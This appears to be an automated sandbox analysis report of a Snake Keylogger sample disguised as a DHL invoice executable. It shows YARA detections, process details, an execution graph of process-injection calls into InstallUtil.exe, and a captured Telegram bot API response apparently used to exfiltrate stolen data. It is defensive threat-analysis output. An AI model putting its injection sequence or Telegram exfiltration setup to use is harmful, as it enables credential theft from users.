                                                                                                              2024-12-20 09:23:09 UTC514INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 34 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 37 34 39 34 37 38 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 61 72 62 74 72 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 72 62 74 72 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 37 33 38 30 32 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 72 61 63 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6c 74 6f 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 75 67 79 74 72 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 38 36 35 38 39 2c 22 64 6f 63 75 6d
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":2483,"from":{"id":8174947883,"is_bot":true,"first_name":"arbtr_bot","username":"arbtrs_bot"},"chat":{"id":6287380231,"first_name":"Grace","last_name":"Milton","username":"iugytr","type":"private"},"date":1734686589,"docum


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:04:22:00
                                                                                                              Start date:20/12/2024
                                                                                                              Path:C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe"
                                                                                                              Imagebase:0x80000
                                                                                                              File size:45'056 bytes
                                                                                                              MD5 hash:1147FDF9A4F5F4DCDBDD6C080C88E083
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2050649719.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:04:22:35
                                                                                                              Start date:20/12/2024
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                              Imagebase:0x50000
                                                                                                              File size:42'064 bytes
                                                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2940130567.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2940130567.0000000002659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:11.8%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:2%
                                                                                                                Total number of Nodes:304
                                                                                                                Total number of Limit Nodes:4
                                                                                                                execution_graph 53565 523ed10 53566 523ed5e NtProtectVirtualMemory 53565->53566 53568 523eda8 53566->53568 53178 a51b20 53179 a51b3a 53178->53179 53180 a51b4a 53179->53180 53184 a56e81 53179->53184 53188 a56d4d 53179->53188 53193 a560f2 53179->53193 53185 a56eaa 53184->53185 53196 a5fee0 53185->53196 53189 a5d65d 53188->53189 53209 5391229 53189->53209 53213 5391238 53189->53213 53190 a5d681 53195 a5fee0 2 API calls 53193->53195 53194 a52762 53195->53194 53198 a5ff07 53196->53198 53197 a56ed1 53201 53903a0 53198->53201 53205 53903a8 53198->53205 53202 53903a8 VirtualProtect 53201->53202 53204 539042b 53202->53204 53204->53197 53206 53903f0 VirtualProtect 53205->53206 53208 539042b 53206->53208 53208->53197 53210 5391235 53209->53210 53217 5391279 53210->53217 53214 539124d 53213->53214 53216 5391279 2 API calls 53214->53216 53215 5391265 53215->53190 53216->53215 53219 53912af 53217->53219 53218 5391265 53218->53190 53222 5391388 53219->53222 53226 5391390 53219->53226 53223 5391390 VirtualAlloc 53222->53223 53225 539140a 53223->53225 53225->53218 53227 53913d0 VirtualAlloc 53226->53227 53229 539140a 53227->53229 53229->53218 53542 5f78a50 53543 5f78a65 53542->53543 53547 5f78e98 53543->53547 53552 5f78e88 53543->53552 53544 5f78a7b 53549 5f78ec2 53547->53549 53548 5f78faf 53548->53544 53549->53548 53557 5f7c9c0 53549->53557 53561 5f7c9bb 53549->53561 53554 5f78e98 53552->53554 53553 5f78faf 53553->53544 53554->53553 53555 5f7c9c0 SleepEx 53554->53555 53556 5f7c9bb SleepEx 53554->53556 53555->53554 53556->53554 53558 5f7ca00 SleepEx 53557->53558 53560 5f7ca3e 53558->53560 53560->53549 53562 5f7c9c0 SleepEx 53561->53562 53564 5f7ca3e 53562->53564 53564->53549 53230 5234ff8 53231 523500d 53230->53231 53232 5235023 53231->53232 53234 52354ae 53231->53234 53235 52354cf 53234->53235 53239 5236a48 53235->53239 53244 5236a58 53235->53244 53240 5236a58 53239->53240 53249 523702a 53240->53249 53255 5236b29 53240->53255 53245 5236a6d 53244->53245 53247 523702a 5 API calls 53245->53247 53248 5236b29 5 API calls 53245->53248 53246 523561f 53247->53246 53248->53246 53250 5236b28 53249->53250 53251 5236b13 53249->53251 53261 52374c1 53250->53261 53301 5237479 53250->53301 53342 52374d0 53250->53342 53256 5236b41 53255->53256 53258 52374c1 5 API calls 53256->53258 53259 52374d0 5 API calls 53256->53259 53260 5237479 5 API calls 53256->53260 53257 5236b13 53258->53257 53259->53257 53260->53257 53262 52374e5 53261->53262 53382 5237ee7 53262->53382 53387 523871f 53262->53387 53390 5237918 53262->53390 53393 5238899 53262->53393 53398 523871a 53262->53398 53401 52381d4 53262->53401 53404 5238114 53262->53404 53408 5237dd7 53262->53408 53411 5238151 53262->53411 53415 52386d1 53262->53415 53418 5238ad3 53262->53418 53421 5238893 53262->53421 53424 5237e4c 53262->53424 53427 523884d 53262->53427 53430 5237d4e 53262->53430 53433 5237b08 53262->53433 53436 5238b0b 53262->53436 53441 5237e84 53262->53441 53444 5238cc4 53262->53444 53447 5238287 53262->53447 53450 52382c3 53262->53450 53453 5237efd 53262->53453 53458 5238638 53262->53458 53461 5237dba 53262->53461 53464 5237bbb 53262->53464 53467 52385b1 53262->53467 53470 5237b32 53262->53470 53473 5238df3 53262->53473 53478 5238433 53262->53478 53481 5237b2d 53262->53481 53484 5238dad 53262->53484 53487 5237928 53262->53487 53490 5237ca4 53262->53490 53495 5238d64 53262->53495 53498 5238364 53262->53498 53501 5237fe7 53262->53501 53504 5238467 53262->53504 53302 52374c6 53301->53302 53304 5237482 53301->53304 53305 5237ee7 3 API calls 53302->53305 53306 5238467 2 API calls 53302->53306 53307 5237fe7 2 API calls 53302->53307 53308 5238364 2 API calls 53302->53308 53309 5238d64 2 API calls 53302->53309 53310 5237ca4 3 API calls 53302->53310 53311 5237928 2 API calls 53302->53311 53312 5238dad 2 API calls 53302->53312 53313 5237b2d 2 API calls 53302->53313 53314 5238433 2 API calls 53302->53314 53315 5238df3 3 API calls 53302->53315 53316 5237b32 2 API calls 53302->53316 53317 52385b1 2 API calls 53302->53317 53318 5237bbb 2 API calls 53302->53318 53319 5237dba 2 API calls 53302->53319 53320 5238638 2 API calls 53302->53320 53321 5237efd 3 API calls 53302->53321 53322 52382c3 2 API calls 53302->53322 53323 5238287 2 API calls 53302->53323 53324 5238cc4 2 API calls 53302->53324 53325 5237e84 2 API calls 53302->53325 53326 5238b0b NtResumeThread 53302->53326 53327 5237b08 2 API calls 53302->53327 53328 5237d4e 2 API calls 53302->53328 53329 523884d 2 API calls 53302->53329 53330 5237e4c 2 API calls 53302->53330 53331 5238893 2 API calls 53302->53331 53332 5238ad3 2 API calls 53302->53332 53333 52386d1 2 API calls 53302->53333 53334 5238151 NtResumeThread 53302->53334 53335 5237dd7 2 API calls 53302->53335 53336 5238114 2 API calls 53302->53336 53337 52381d4 2 API calls 53302->53337 53338 523871a 2 API calls 53302->53338 53339 5238899 3 API calls 53302->53339 53340 5237918 2 API calls 53302->53340 53341 523871f 2 API calls 53302->53341 53303 5237507 53303->53251 53304->53251 53305->53303 53306->53303 53307->53303 53308->53303 53309->53303 53310->53303 53311->53303 53312->53303 53313->53303 53314->53303 53315->53303 53316->53303 53317->53303 53318->53303 53319->53303 53320->53303 53321->53303 53322->53303 53323->53303 53324->53303 53325->53303 53326->53303 53327->53303 53328->53303 53329->53303 53330->53303 53331->53303 53332->53303 53333->53303 53334->53303 53335->53303 53336->53303 53337->53303 53338->53303 53339->53303 53340->53303 53341->53303 53343 52374e5 53342->53343 53345 5237ee7 3 API calls 53343->53345 53346 5238467 2 API calls 53343->53346 53347 5237fe7 2 API calls 53343->53347 53348 5238364 2 API calls 53343->53348 53349 5238d64 2 API calls 53343->53349 53350 5237ca4 3 API calls 53343->53350 53351 5237928 2 API calls 53343->53351 53352 5238dad 2 API calls 53343->53352 53353 5237b2d 2 API calls 53343->53353 53354 5238433 2 API calls 53343->53354 53355 5238df3 3 API calls 53343->53355 53356 5237b32 2 API calls 53343->53356 53357 52385b1 2 API calls 53343->53357 53358 5237bbb 2 API calls 53343->53358 53359 5237dba 2 API calls 53343->53359 53360 5238638 2 API calls 53343->53360 53361 5237efd 3 API calls 53343->53361 53362 52382c3 2 API calls 53343->53362 53363 5238287 2 API calls 53343->53363 53364 5238cc4 2 API calls 53343->53364 53365 5237e84 2 API calls 53343->53365 53366 5238b0b NtResumeThread 53343->53366 53367 5237b08 2 API calls 53343->53367 53368 5237d4e 2 API calls 53343->53368 53369 523884d 2 API calls 53343->53369 53370 5237e4c 2 API calls 53343->53370 53371 5238893 2 API calls 53343->53371 53372 5238ad3 2 API calls 53343->53372 53373 52386d1 2 API calls 53343->53373 53374 5238151 NtResumeThread 53343->53374 53375 5237dd7 2 API calls 53343->53375 53376 5238114 2 API calls 53343->53376 53377 52381d4 2 API calls 53343->53377 53378 523871a 2 API calls 53343->53378 53379 5238899 3 API calls 53343->53379 53380 5237918 2 API calls 53343->53380 53381 523871f 2 API calls 53343->53381 53344 5237507 53344->53251 53345->53344 53346->53344 53347->53344 53348->53344 53349->53344 53350->53344 53351->53344 53352->53344 53353->53344 53354->53344 53355->53344 53356->53344 53357->53344 53358->53344 53359->53344 53360->53344 53361->53344 53362->53344 53363->53344 53364->53344 53365->53344 53366->53344 53367->53344 53368->53344 53369->53344 53370->53344 53371->53344 53372->53344 53373->53344 53374->53344 53375->53344 53376->53344 53377->53344 53378->53344 53379->53344 53380->53344 53381->53344 53383 5237eed 53382->53383 53507 52e0648 53383->53507 53384 523799a 53511 5239350 53384->53511 53388 523799a 53387->53388 53389 5239350 2 API calls 53388->53389 53389->53388 53391 5237928 53390->53391 53392 5239350 2 API calls 53391->53392 53392->53391 53394 52388a8 53393->53394 53397 52e0648 VirtualAllocEx 53394->53397 53395 523799a 53396 5239350 2 API calls 53395->53396 53396->53395 53397->53395 53399 523799a 53398->53399 53400 5239350 2 API calls 53399->53400 53400->53399 53402 523799a 53401->53402 53403 5239350 2 API calls 53402->53403 53403->53402 53405 523799a 53404->53405 53406 5238b28 53404->53406 53407 5239350 2 API calls 53405->53407 53407->53405 53409 523799a 53408->53409 53410 5239350 2 API calls 53409->53410 53410->53409 53412 523815b 53411->53412 53534 52e1370 53412->53534 53416 523799a 53415->53416 53417 5239350 2 API calls 53416->53417 53417->53416 53419 523799a 53418->53419 53420 5239350 2 API calls 53419->53420 53420->53419 53422 523799a 53421->53422 53423 5239350 2 API calls 53422->53423 53423->53422 53425 523799a 53424->53425 53426 5239350 2 API calls 53425->53426 53426->53425 53428 523799a 53427->53428 53429 5239350 2 API calls 53428->53429 53429->53428 53431 523799a 53430->53431 53432 5239350 2 API calls 53431->53432 53432->53431 53434 523799a 53433->53434 53435 5239350 2 API calls 53434->53435 53435->53434 53437 5238b18 53436->53437 53439 5238151 53436->53439 53438 52381b3 53440 52e1370 NtResumeThread 53439->53440 53440->53438 53442 523799a 53441->53442 53443 5239350 2 API calls 53442->53443 53443->53442 53445 523799a 53444->53445 53446 5239350 2 API calls 53445->53446 53446->53445 53448 523799a 53447->53448 53449 5239350 2 API calls 53448->53449 53449->53448 53451 523799a 53450->53451 53452 5239350 2 API calls 53451->53452 53452->53451 53454 5237f07 53453->53454 53456 52e0648 VirtualAllocEx 53454->53456 53455 523799a 53457 5239350 2 API calls 53455->53457 53456->53455 53457->53455 53459 523799a 53458->53459 53460 5239350 2 API calls 53459->53460 53460->53459 53462 523799a 53461->53462 53463 5239350 2 API calls 53462->53463 53463->53462 53465 523799a 53464->53465 53466 5239350 2 API calls 53465->53466 53466->53465 53468 523799a 53467->53468 53468->53467 53469 5239350 2 API calls 53468->53469 53469->53468 53471 523799a 53470->53471 53472 5239350 2 API calls 53471->53472 53472->53471 53474 5238e02 53473->53474 53538 52e08f0 53474->53538 53475 523799a 53477 5239350 2 API calls 53475->53477 53477->53475 53479 523799a 53478->53479 53480 5239350 2 API calls 53479->53480 53480->53479 53482 523799a 53481->53482 53483 5239350 2 API calls 53482->53483 53483->53482 53485 523799a 53484->53485 53486 5239350 2 API calls 53485->53486 53486->53485 53488 523795b 53487->53488 53489 5239350 2 API calls 53488->53489 53489->53488 53491 5237caa 53490->53491 53494 52e08f0 WriteProcessMemory 53491->53494 53492 523799a 53493 5239350 2 API calls 53492->53493 53493->53492 53494->53492 53496 523799a 53495->53496 53497 5239350 2 API calls 53496->53497 53497->53496 53499 523799a 53498->53499 53500 5239350 2 API calls 53499->53500 53500->53499 53502 523799a 53501->53502 53503 5239350 2 API calls 53502->53503 53503->53502 53505 523799a 53504->53505 53506 5239350 2 API calls 53505->53506 53506->53505 53508 52e0688 VirtualAllocEx 53507->53508 53510 52e06c5 53508->53510 53510->53384 53512 5239377 53511->53512 53513 5239399 53512->53513 53516 52394d4 53512->53516 53521 5239458 53512->53521 53513->53384 53517 52394fc 53516->53517 53526 523f765 53517->53526 53530 523f770 53517->53530 53522 5239467 53521->53522 53524 523f770 CreateProcessA 53522->53524 53525 523f765 CreateProcessA 53522->53525 53523 523943e 53524->53523 53525->53523 53527 523f7d4 CreateProcessA 53526->53527 53529 523f95c 53527->53529 53531 523f7d4 CreateProcessA 53530->53531 53533 523f95c 53531->53533 53535 52e13b8 NtResumeThread 53534->53535 53537 52381b3 53535->53537 53539 52e0938 WriteProcessMemory 53538->53539 53541 52e098f 53539->53541 53541->53475
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-312445597
                                                                                                                • Opcode ID: 6f200b195c978c46f90e895f5ef0c03591a24974d6623432fd7180137a115868
                                                                                                                • Instruction ID: 7879dff64998343cf78ba224aaeb7bc4a1890031ea67be6e895650de98887c13
                                                                                                                • Opcode Fuzzy Hash: 6f200b195c978c46f90e895f5ef0c03591a24974d6623432fd7180137a115868
                                                                                                                • Instruction Fuzzy Hash: 69B20834A00228CFDB18CFA9C894BADB7B6BF88700F158595E505AB3A5DB71ED85CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2546334966
                                                                                                                • Opcode ID: d03a4fbc66f7995db4549ccc535d502671d51b94953ea33d4a23569c533b8375
                                                                                                                • Instruction ID: 673000c6d3e348b589936a3a318d5508b9fe6fdd8a423204ea94e6d2ef16670e
                                                                                                                • Opcode Fuzzy Hash: d03a4fbc66f7995db4549ccc535d502671d51b94953ea33d4a23569c533b8375
                                                                                                                • Instruction Fuzzy Hash: FD220C34A00228CFDB28DF65C994BADB7B6FF88301F158499E509AB295DB71ED81CF50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 636 5394fe8-5395009 637 539500b 636->637 638 5395010-53950f7 636->638 637->638 640 53957f9-5395821 638->640 641 53950fd-539523e 638->641 644 5395f27-5395f30 640->644 685 53957c2-53957ec 641->685 686 5395244-539529f 641->686 646 539582f-5395839 644->646 647 5395f36-5395f4d 644->647 648 539583b 646->648 649 5395840-5395934 646->649 648->649 668 539595e 649->668 669 5395936-5395942 649->669 670 5395964-5395984 668->670 671 539594c-5395952 669->671 672 5395944-539594a 669->672 676 53959e4-5395a64 670->676 677 5395986-53959df 670->677 674 539595c 671->674 672->674 674->670 699 5395abb-5395afe 676->699 700 5395a66-5395ab9 676->700 690 5395f24 677->690 696 53957ee 685->696 697 53957f6 685->697 693 53952a1 686->693 694 53952a4-53952af 686->694 690->644 693->694 698 53956d7-53956dd 694->698 696->697 697->640 701 53956e3-539575f 698->701 702 53952b4-53952d2 698->702 721 5395b09-5395b12 699->721 700->721 742 53957ac-53957b2 701->742 703 5395329-539533e 702->703 704 53952d4-53952d8 702->704 707 5395340 703->707 708 5395345-539535b 703->708 704->703 709 53952da-53952e5 704->709 707->708 712 539535d 708->712 713 5395362-5395379 708->713 714 539531b-5395321 709->714 712->713 716 539537b 713->716 717 5395380-5395396 713->717 718 5395323-5395324 714->718 719 53952e7-53952eb 714->719 716->717 724 5395398 717->724 725 539539d-53953a4 717->725 727 53953a7-5395412 718->727 722 53952ed 719->722 723 53952f1-5395309 719->723 729 5395b72-5395b81 721->729 722->723 730 539530b 723->730 731 5395310-5395318 723->731 724->725 725->727 732 5395414-5395420 727->732 733 5395426-53955db 727->733 734 5395b83-5395c0b 729->734 735 5395b14-5395b3c 729->735 730->731 731->714 732->733 740 53955dd-53955e1 733->740 741 539563f-5395654 733->741 770 5395d84-5395d90 734->770 738 5395b3e 735->738 739 5395b43-5395b6c 735->739 738->739 739->729 740->741 744 53955e3-53955f2 740->744 748 539565b-539567c 741->748 749 5395656 741->749 746 5395761-53957a9 742->746 747 53957b4-53957ba 742->747 751 5395631-5395637 744->751 746->742 747->685 752 539567e 748->752 753 5395683-53956a2 748->753 749->748 757 5395639-539563a 751->757 758 53955f4-53955f8 751->758 752->753 754 53956a9-53956c9 753->754 755 53956a4 753->755 763 53956cb 754->763 764 53956d0 754->764 755->754 765 53956d4 757->765 761 53955fa-53955fe 758->761 762 5395602-5395623 758->762 761->762 766 539562a-539562e 762->766 767 5395625 762->767 763->764 764->765 765->698 766->751 767->766 772 5395c10-5395c19 770->772 773 5395d96-5395df1 770->773 774 5395c1b 772->774 775 5395c22-5395d78 772->775 788 5395e28-5395e52 773->788 789 5395df3-5395e26 773->789 774->775 777 5395c28-5395c68 774->777 778 5395c6d-5395cad 774->778 779 5395cb2-5395cf2 774->779 780 5395cf7-5395d37 774->780 790 5395d7e 775->790 777->790 778->790 779->790 780->790 797 5395e5b-5395eee 788->797 789->797 790->770 801 5395ef5-5395f15 797->801 801->690
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: TJcq$Te^q$pbq$xbaq
                                                                                                                • API String ID: 0-1954897716
                                                                                                                • Opcode ID: 6f5af0e0c00e8a7c42bd610a4f7d482c947800f28b65712ca36df9e8016353c7
                                                                                                                • Instruction ID: a285d944611e8a096b7d9050b37e39ef36227de34a12fa22fa5992f75a7a5a40
                                                                                                                • Opcode Fuzzy Hash: 6f5af0e0c00e8a7c42bd610a4f7d482c947800f28b65712ca36df9e8016353c7
                                                                                                                • Instruction Fuzzy Hash: 18A2A775A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1272 53973c8-5397406 1273 5397408 1272->1273 1274 539740d-539752f 1272->1274 1273->1274 1278 5397531-5397547 1274->1278 1279 5397553-539755f 1274->1279 1556 539754d call 5399f59 1278->1556 1557 539754d call 5399f68 1278->1557 1280 5397561 1279->1280 1281 5397566-539756b 1279->1281 1280->1281 1283 539756d-5397579 1281->1283 1284 53975a3-53975ec 1281->1284 1285 539757b 1283->1285 1286 5397580-539759e 1283->1286 1292 53975ee 1284->1292 1293 53975f3-53978b8 1284->1293 1285->1286 1287 5398d07-5398d0d 1286->1287 1289 5398d38 1287->1289 1290 5398d0f-5398d2f 1287->1290 1290->1289 1292->1293 1319 53982e8-53982f4 1293->1319 1320 53982fa-5398332 1319->1320 1321 53978bd-53978c9 1319->1321 1330 539840c-5398412 1320->1330 1322 53978cb 1321->1322 1323 53978d0-53979f5 1321->1323 1322->1323 1358 5397a35-5397abe 1323->1358 1359 53979f7-5397a2f 1323->1359 1331 5398418-5398450 1330->1331 1332 5398337-539838d 1330->1332 1342 53987ae-53987b4 1331->1342 1346 5398399-53983b4 1332->1346 1344 53987ba-5398802 1342->1344 1345 5398455-5398657 1342->1345 1353 539887d-5398889 1344->1353 1354 5398804-5398877 1344->1354 1439 539865d-53986f1 1345->1439 1440 53986f6-53986fa 1345->1440 1347 53983e7-5398409 1346->1347 1348 53983b6-53983ba 1346->1348 1347->1330 1348->1347 1352 53983bc-53983e4 1348->1352 1352->1347 1360 5398890-53988c8 1353->1360 1354->1353 1386 5397acd-5397b51 1358->1386 1387 5397ac0-5397ac8 1358->1387 1359->1358 1377 5398cd1-5398cd7 1360->1377 1379 53988cd-539894f 1377->1379 1380 5398cdd-5398d05 1377->1380 1398 5398951-539896c 1379->1398 1399 5398977-5398983 1379->1399 1380->1287 1414 5397b60-5397be4 1386->1414 1415 5397b53-5397b5b 1386->1415 1388 53982d9-53982e5 1387->1388 1388->1319 1398->1399 1401 539898a-5398996 1399->1401 1402 5398985 1399->1402 1406 53989a9-53989b8 1401->1406 1407 5398998-53989a4 1401->1407 1402->1401 1410 53989ba 1406->1410 1411 53989c1-5398c99 1406->1411 1409 5398cb8-5398cce 1407->1409 1409->1377 1410->1411 1416 5398b8e-5398bf6 1410->1416 1417 5398b20-5398b89 1410->1417 1418 5398ab2-5398b1b 1410->1418 1419 5398a35-5398aad 1410->1419 1420 53989c7-5398a30 1410->1420 1443 5398ca4-5398cb0 1411->1443 1462 5397bf3-5397c77 1414->1462 1463 5397be6-5397bee 1414->1463 1415->1388 1450 5398c6a-5398c70 1416->1450 1417->1443 1418->1443 1419->1443 1420->1443 1464 5398795-53987ab 1439->1464 1445 53986fc-5398755 1440->1445 1446 5398757-5398794 1440->1446 1443->1409 1445->1464 1446->1464 1455 5398bf8-5398c56 1450->1455 1456 5398c72-5398c7c 1450->1456 1467 5398c58 1455->1467 1468 5398c5d-5398c67 1455->1468 1456->1443 1477 5397c79-5397c81 1462->1477 1478 5397c86-5397d0a 1462->1478 1463->1388 1464->1342 1467->1468 1468->1450 1477->1388 1484 5397d19-5397d9d 1478->1484 1485 5397d0c-5397d14 1478->1485 1491 5397dac-5397e30 1484->1491 1492 5397d9f-5397da7 1484->1492 1485->1388 1498 5397e3f-5397ec3 1491->1498 1499 5397e32-5397e3a 1491->1499 1492->1388 1505 5397ed2-5397f56 1498->1505 1506 5397ec5-5397ecd 1498->1506 1499->1388 1512 5397f58-5397f60 1505->1512 1513 5397f65-5397fe9 1505->1513 1506->1388 1512->1388 1519 5397ff8-539807c 1513->1519 1520 5397feb-5397ff3 1513->1520 1526 539808b-539810f 1519->1526 1527 539807e-5398086 1519->1527 1520->1388 1533 539811e-53981a2 1526->1533 1534 5398111-5398119 1526->1534 1527->1388 1540 53981b1-5398235 1533->1540 1541 53981a4-53981ac 1533->1541 1534->1388 1547 5398244-53982c8 1540->1547 1548 5398237-539823f 1540->1548 1541->1388 1554 53982ca-53982d2 1547->1554 1555 53982d4-53982d6 1547->1555 1548->1388 1554->1388 1555->1388 1556->1279 1557->1279
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 2$$^q
                                                                                                                • API String ID: 0-1071376767
                                                                                                                • Opcode ID: 30dd8e68154c903a526c2a814adc47c07aa1a716b29106fd326df5dda2bd21cd
                                                                                                                • Instruction ID: 4d6fd21202312d38aec38c40fc968925dc2376b4fcb6623c4a3b23bfa38c79e2
                                                                                                                • Opcode Fuzzy Hash: 30dd8e68154c903a526c2a814adc47c07aa1a716b29106fd326df5dda2bd21cd
                                                                                                                • Instruction Fuzzy Hash: 71E2B274A04228CFDB64DF68D884B9EBBF6FB89301F1081AAD509A7395DB305E85CF51

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
